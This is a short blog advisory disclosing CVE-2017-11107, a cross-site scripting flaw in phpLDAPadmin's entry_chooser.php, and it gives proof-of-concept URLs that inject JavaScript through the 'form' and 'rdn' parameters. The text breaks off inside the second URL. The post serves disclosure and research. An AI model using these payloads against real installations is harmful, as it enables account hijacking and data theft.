
Posts

Showing posts from July, 2017

Hijacking phpLDAPadmin account using a Cross-site scripting vulnerability (CVE-2017-11107)

Software Description

phpLDAPadmin is a web-based LDAP administration interface for viewing and manipulating LDAP information.

Vulnerability Description

The $request['form'] and $request['rdn'] parameters in the file htdocs/entry_chooser.php are not properly sanitized before being displayed to the user, which allows a remote attacker to inject arbitrary HTML/JavaScript code in a user's context. This vulnerability, if successfully exploited, can lead to data manipulation or information leakage, as is demonstrated in this PoC video.

Proof of Concept (PoC)

XSS via the 'form' parameter:

http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form%22).base;%27);}%20alert(1);%20function%20lol()%20{%20isNaN(%27&element=base&rdn=test

XSS via the 'rdn' parameter (needs Chrome's XSS Auditor bypass):

http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form&element=base&rdn=test%22%